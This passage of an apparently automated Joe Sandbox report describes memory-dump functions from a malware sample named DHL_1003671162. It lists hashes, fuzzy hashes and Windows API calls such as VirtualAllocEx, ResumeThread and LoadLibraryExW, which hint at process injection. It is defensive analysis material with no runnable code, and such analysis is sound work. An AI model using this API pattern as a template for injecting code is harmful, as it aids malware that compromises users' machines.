                                                • Instruction Fuzzy Hash: 7221E4B5900208DFDB10CFAAD584ADEFBF4FB48314F14801AE958A7310D374A944CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0289AF88 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0289B3D1,00000800,00000000,00000000), ref: 0289B5C2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1690251011.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2890000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: d4755dfb76f86eba2c329e981ac731aa5fbd68893ce742955f53e0cd91bfbd40
                                                • Instruction ID: cc3edbf2aaf21f576a07ee3c2eebf828c7870bdad77787c22e683e84e303b975
                                                • Opcode Fuzzy Hash: d4755dfb76f86eba2c329e981ac731aa5fbd68893ce742955f53e0cd91bfbd40
                                                • Instruction Fuzzy Hash: 181126BA9003489FDB10CF9AD448ADEFBF4EB88314F14842EE559B7210C375A945CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0289B550 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0289B3D1,00000800,00000000,00000000), ref: 0289B5C2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1690251011.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2890000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 9ba626578ea442d5c8c22615b3580d6a585a0592ffe662dadc39516678736c53
                                                • Instruction ID: 5b04efe6435893e9252b27e4c20b76e54d852f8424aa0ee20c55656db4d3ac6c
                                                • Opcode Fuzzy Hash: 9ba626578ea442d5c8c22615b3580d6a585a0592ffe662dadc39516678736c53
                                                • Instruction Fuzzy Hash: 231126B6D003489FDB10CF9AD444ADEFBF4EB88314F14842ED459A7210C375A545CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0AE878DA Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0AE8794E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 9666e7e015b61e5a5c2b7bcf5c418e404d0324e2f473e9317d0cd7b17985a020
                                                • Instruction ID: f65a783146f1025183da51bdd0afb564c4ac06bdbf6b1e30f07969bfc98741b5
                                                • Opcode Fuzzy Hash: 9666e7e015b61e5a5c2b7bcf5c418e404d0324e2f473e9317d0cd7b17985a020
                                                • Instruction Fuzzy Hash: 6B116AB19002499FDB20DFA9C445BEEBFF1EF88314F248419E599A7260C7359544CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0AE878E0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0AE8794E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 86007bed22e2493ccd828975c47d99aadd9316033e9f7b313466e1cd92ff0a35
                                                • Instruction ID: 5b44fa8e1090780cc44296e0bdbf314e69cb45637ed3d3f7cd2266e30b683bc9
                                                • Opcode Fuzzy Hash: 86007bed22e2493ccd828975c47d99aadd9316033e9f7b313466e1cd92ff0a35
                                                • Instruction Fuzzy Hash: 6B1137B19003499FDB10DFAAC845BDEBFF5EF88324F208419E559A7250C775A544CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0AE8731A Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 0AE87382
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 5893f73d746e101e0820197ed403cd5b66092edb5448c6e8f7d10cce5d7d9013
                                                • Instruction ID: 1179643938340d0a3e1459be392b7cb20306c12c68a4555d0e8e6ca5995be405
                                                • Opcode Fuzzy Hash: 5893f73d746e101e0820197ed403cd5b66092edb5448c6e8f7d10cce5d7d9013
                                                • Instruction Fuzzy Hash: AE112BB1D003488FDB20DFA9C4457EEFFF5AB88314F248419D499A7250C7796945CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0AE87320 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 0AE87382
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 506cbae2bc9010e6b431810babc70e0b66c382d4c0dc6b6ad04f0ef430761a59
                                                • Instruction ID: fc228e9cd986c177d18a497bd7028030e14db1fad1a59cf887cb40ccf6b86b71
                                                • Opcode Fuzzy Hash: 506cbae2bc9010e6b431810babc70e0b66c382d4c0dc6b6ad04f0ef430761a59
                                                • Instruction Fuzzy Hash: EB1136B19003488FDB20DFAAC4457DEFBF4EB88324F208429D459A7250CB79A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0AE8BED0 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0AE8BF35
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 79adef9f0f43e60631f4953cc41ade2e524418a95cc716cc372cf45ebae866ac
                                                • Instruction ID: c9cfcc6a8e2df1125643318bc706d96fece5db09a5ca22a6fad49444c48cf4ad
                                                • Opcode Fuzzy Hash: 79adef9f0f43e60631f4953cc41ade2e524418a95cc716cc372cf45ebae866ac
                                                • Instruction Fuzzy Hash: 571106B58003499FDB10DF99D885BDEBFF8EB48324F108419E558A7211C375A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0289AEF0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0289AF56
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1690251011.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2890000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 3859bb3c333145da46c5ed5802f3caeaee8ec7c39d7f7c6e6957341fb1f01e10
                                                • Instruction ID: 87491c9db9518b2c2c971e7b30548d572855dfd2767937301d7ab666c42be08f
                                                • Opcode Fuzzy Hash: 3859bb3c333145da46c5ed5802f3caeaee8ec7c39d7f7c6e6957341fb1f01e10
                                                • Instruction Fuzzy Hash: B61110BAC003498FDB14CF9AC444BDEFBF4AB88324F14842AD469B7610C379A545CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0AE87CD0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0AE8BF35
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: f39e019e2f0d805a02bdcdee038a040ed8ca2964e993ece169337a4b3cedbad6
                                                • Instruction ID: ebe1b760040808000332ba551b58ac2ac550173edadd17005f3909b19f5463c6
                                                • Opcode Fuzzy Hash: f39e019e2f0d805a02bdcdee038a040ed8ca2964e993ece169337a4b3cedbad6
                                                • Instruction Fuzzy Hash: FD1103B5800348DFDB20DF9AC889BDEBFF8EB48324F108459E958A7211C375A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B2CDC Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q
                                                • API String ID: 0-671973202
                                                • Opcode ID: 09d38017203b3b5fc300b834deb57d96e98819f70f8bf8571c256bf88d2225ba
                                                • Instruction ID: 5e76bd52760363740184fd844505bbc5ecd5991cd0901097edb563be37f9fbcf
                                                • Opcode Fuzzy Hash: 09d38017203b3b5fc300b834deb57d96e98819f70f8bf8571c256bf88d2225ba
                                                • Instruction Fuzzy Hash: 4E51E0B0B042458FCB25DB7998888BFBBF6EFC43207148969E45ACB791DB30DC058791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B8F69 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: O};5
                                                • API String ID: 0-3558557551
                                                • Opcode ID: 55ef6d847ec552e255a50c08e6b6da12e9aa8072aaed60be59beb26d256732fc
                                                • Instruction ID: 9716663246bf6545c8d6bf7c192fe001d0ad211e3f233cd7c9a88d377ff5e91c
                                                • Opcode Fuzzy Hash: 55ef6d847ec552e255a50c08e6b6da12e9aa8072aaed60be59beb26d256732fc
                                                • Instruction Fuzzy Hash: 69418EB0A15209DFCB44CF95D5858AEFFB6FB89200F60989AD405E7368D734EA11CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B8F78 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: O};5
                                                • API String ID: 0-3558557551
                                                • Opcode ID: 88052a6363c2ab66a234a40008d0b0667834f4b657b22ae220c24e8594f47921
                                                • Instruction ID: 6ba604a0e5d7a1f4d934aed2304387aa318663c843e8767e00abf5543e764a9a
                                                • Opcode Fuzzy Hash: 88052a6363c2ab66a234a40008d0b0667834f4b657b22ae220c24e8594f47921
                                                • Instruction Fuzzy Hash: FC416DB0A14209DFCB44CF99D5858AEFBB6FB89300F60D899D509E7368D734EA11CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071BAE78 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q
                                                • API String ID: 0-671973202
                                                • Opcode ID: 6c0f24757bd0b8387a7374049b534fc78ae3de93176ef595deea678cff830e86
                                                • Instruction ID: b48761e78821d1b77f636b61dadb93108394c0687f661dfff27278bef931e0a6
                                                • Opcode Fuzzy Hash: 6c0f24757bd0b8387a7374049b534fc78ae3de93176ef595deea678cff830e86
                                                • Instruction Fuzzy Hash: 4D115EB1B0021A8BCB15EBB999105EFB7F2AF84310F10406AD405E7284EF319E06CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071BE330 Relevance: .2, Instructions: 205COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7ac5658b82fc028e9402f03978c7c7bb72731b2533cf0b89faf7a0f1d2b92c5b
                                                • Instruction ID: 2c5ece4b56fb3e50626c1e77a4387381bfcc7fe47a685c0f8b9648442a2fae7b
                                                • Opcode Fuzzy Hash: 7ac5658b82fc028e9402f03978c7c7bb72731b2533cf0b89faf7a0f1d2b92c5b
                                                • Instruction Fuzzy Hash: 616103B0A14211DFC7298F39C8506FABBB2BB86711F15857AE426CB3D1D735C8498B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B34EF Relevance: .2, Instructions: 163COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6a23f5a8fa9f95a9797297fbc9afa2602cceba45fab026228a39f920c676a976
                                                • Instruction ID: 70cb2145c39e40712a45e6b216aac57bfc51cd6ee148277ed239ce3df303750d
                                                • Opcode Fuzzy Hash: 6a23f5a8fa9f95a9797297fbc9afa2602cceba45fab026228a39f920c676a976
                                                • Instruction Fuzzy Hash: 5A51CFF0A14515CBCB29CF69C8802FEBBB1FB4A311F05862AE5768B2D1D738D965CB11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B2C57 Relevance: .2, Instructions: 159COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e0562a930c3d305358a4ef1c78e678ad6f016b6a7c2f20c95200ed79e7e898d
                                                • Instruction ID: d094d72aa4011a60619641347ef61da8d7729999faa82b9a4981078c48d2e913
                                                • Opcode Fuzzy Hash: 6e0562a930c3d305358a4ef1c78e678ad6f016b6a7c2f20c95200ed79e7e898d
                                                • Instruction Fuzzy Hash: 5751F1B29192598FCB26DF68C8506EA7FB0FF06310F014297E455DB2A2D338D949CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B8E10 Relevance: .1, Instructions: 131COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 59bab3c2eac3a50d9c36da164a752c3f36e4aeb8d9ca8018d098dd77ac4e10a8
                                                • Instruction ID: 3af5bb9c57e8c208df7af60c8e774278c6e43867fbe4ccfd80bac384484ea41c
                                                • Opcode Fuzzy Hash: 59bab3c2eac3a50d9c36da164a752c3f36e4aeb8d9ca8018d098dd77ac4e10a8
                                                • Instruction Fuzzy Hash: 8241D2B49097849FC706CF69E440898BFB0EF8A215F5A84D7C884DB3B3D7389945C716
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B90F0 Relevance: .1, Instructions: 117COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0476be7c45682e6ebc80924ad65f46243b0a104a45ee1025c7fd5fd0309c55ee
                                                • Instruction ID: a74e0b580d2550986128c32831b9820a4b56a1ceacb66c029960651d21a21832
                                                • Opcode Fuzzy Hash: 0476be7c45682e6ebc80924ad65f46243b0a104a45ee1025c7fd5fd0309c55ee
                                                • Instruction Fuzzy Hash: F94180B5E0420AEFCB05CF95E8819EEBBB2FF89310F149566E505B7350D7749A41CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071BB2DC Relevance: .1, Instructions: 103COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d8eb8d67cff6e78b67df30f3fa23e3f917fba4745db09d2f749a33479b605a89
                                                • Instruction ID: 67f8db3463e614578605abf4650a4c196ba3d6df34d07a64402c5a1d06fc9ec2
                                                • Opcode Fuzzy Hash: d8eb8d67cff6e78b67df30f3fa23e3f917fba4745db09d2f749a33479b605a89
                                                • Instruction Fuzzy Hash: 723169B1900209AFDF20DFA9C884ADEBFF9EF48310F10842AE409A7250D735A950CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071BB228 Relevance: .1, Instructions: 102COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 15c28b41cf69c8a247a67b3abf7b164941409e86d7a5310a5fb89a4671fbeebb
                                                • Instruction ID: 228cc7c75b80f58732fb5da53a7f7697a984271b8a0041be61cdfc6c4219219c
                                                • Opcode Fuzzy Hash: 15c28b41cf69c8a247a67b3abf7b164941409e86d7a5310a5fb89a4671fbeebb
                                                • Instruction Fuzzy Hash: D631B3B18097948FDB22DF69D4546DAFFF0EF46214F05809BC495AB262C378A448CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B2CF2 Relevance: .1, Instructions: 99COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: af32a84f25423addaac0c212a330d695fc4a2364672166ca2b57501866de7303
                                                • Instruction ID: 618a57ec410feaa1a299fa13c77fc4c2ce9e9ebdc35186afa39139e34a70e255
                                                • Opcode Fuzzy Hash: af32a84f25423addaac0c212a330d695fc4a2364672166ca2b57501866de7303
                                                • Instruction Fuzzy Hash: 2641ABB5A1420ACFCB25CFA8D8807EABBF0FF0A310F51422AE915E7295D334D955CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B3687 Relevance: .1, Instructions: 82COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 274e2dae1368623995fb92512ad4120f750ceb7cc1cd4aa7f42a90c1f300abb4
                                                • Instruction ID: 32252997156b77e649977d0fe08904a22e885004472c1611530e35750e8a0f38
                                                • Opcode Fuzzy Hash: 274e2dae1368623995fb92512ad4120f750ceb7cc1cd4aa7f42a90c1f300abb4
                                                • Instruction Fuzzy Hash: 423103F4920151EBC7298B69C4043F9B7A2FF47309F5A81A7E4758F2C6C73A94A2CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 027FD43C Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1689920510.00000000027FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027FD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_27fd000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a62d6c3471321b5088a30ad12c068602790e64140abc9b0fae6b50b4ea7803fb
                                                • Instruction ID: 058b70ac1a4f86e8f42be4c064726d288580abaa3c043ebb803c13382692ae43
                                                • Opcode Fuzzy Hash: a62d6c3471321b5088a30ad12c068602790e64140abc9b0fae6b50b4ea7803fb
                                                • Instruction Fuzzy Hash: 7E2125B1508200EFDB69DF14D9C0B26BF65FB98324F20C569EE094B356C336E456C6A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071BB344 Relevance: .1, Instructions: 73COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b141acb15cd556a76061242476962238852135012d9227fc13d5095ca3cf7c52
                                                • Instruction ID: 0b7859b782f69fdc96eb1691ba0b2eecff4c5dae14235e3d5d211822473067ac
                                                • Opcode Fuzzy Hash: b141acb15cd556a76061242476962238852135012d9227fc13d5095ca3cf7c52
                                                • Instruction Fuzzy Hash: 582105B1A083855FC732DB798C408BFBFB6EEC5160708456AE855DB692DB309905C3A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071BC8A8 Relevance: .1, Instructions: 73COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5e4c9c2eefe4ec7aa7a9710e1f23aab6a462caf7a3c85c4fbb35bb56d949bc8d
                                                • Instruction ID: efeff9743476862443b167d8ff7ff87480dbf4d167adf57675151ea300c3828f
                                                • Opcode Fuzzy Hash: 5e4c9c2eefe4ec7aa7a9710e1f23aab6a462caf7a3c85c4fbb35bb56d949bc8d
                                                • Instruction Fuzzy Hash: 131184B560E3849FCB16DB749C564EE7FF89F4210471444EAE844CB692EA349D0587A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0280D36C Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1689984665.000000000280D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0280D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_280d000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d9113bcb023a57cd06e1811510355a6e95aa8d2f8a6cc0c21863ecc0d2d35a06
                                                • Instruction ID: 796afd199c3d146bffbae9e05881362370fe52e6f227509be1b7154fb97d76e5
                                                • Opcode Fuzzy Hash: d9113bcb023a57cd06e1811510355a6e95aa8d2f8a6cc0c21863ecc0d2d35a06
                                                • Instruction Fuzzy Hash: 1121047D504204DFDB44DF94D9C4B26BBA5FB84318F24C56DE90D8B2D6C33AD846CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0280D1B4 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1689984665.000000000280D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0280D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_280d000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e6f4bf7b033c2323dd7832b4e561c8f6dc0ec9a110bdf5a6fe7dfffe026b6f4e
                                                • Instruction ID: 0fda07203eaac2a8b34799fd146809d6dfe744d24ad7ba2d31349cd142499c22
                                                • Opcode Fuzzy Hash: e6f4bf7b033c2323dd7832b4e561c8f6dc0ec9a110bdf5a6fe7dfffe026b6f4e
                                                • Instruction Fuzzy Hash: 3321047D504304DFDB45DF94C9C0B26BBA5FB88318F20C56DE80D8B296C73AE846CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071BB0DC Relevance: .1, Instructions: 67COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 00e43a2c72b8424e1bb39f58302d5e043497273ec3de8c27c3c698fce180e66f
                                                • Instruction ID: db2773adfce2d6c814aed158d596762b60483d224d49f95db90c3593896a78ee
                                                • Opcode Fuzzy Hash: 00e43a2c72b8424e1bb39f58302d5e043497273ec3de8c27c3c698fce180e66f
                                                • Instruction Fuzzy Hash: EB31C3B0D05218DFDB20DF99C588BDEBBF4EB08314F248459E408BB690C7B59945CF96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071BB504 Relevance: .1, Instructions: 66COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ff65180dd7ec173553630bac72ac573149836e622490cc83085d772a6ac3005d
                                                • Instruction ID: d288b6098cda00c7fa68728908f383beed55336aa11d7771991748e570dd1925
                                                • Opcode Fuzzy Hash: ff65180dd7ec173553630bac72ac573149836e622490cc83085d772a6ac3005d
                                                • Instruction Fuzzy Hash: 9331E0B0D15258DFDB20DF99C584BCEBFF4AB08314F24805AE448BB690C7B59945CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B8EA0 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
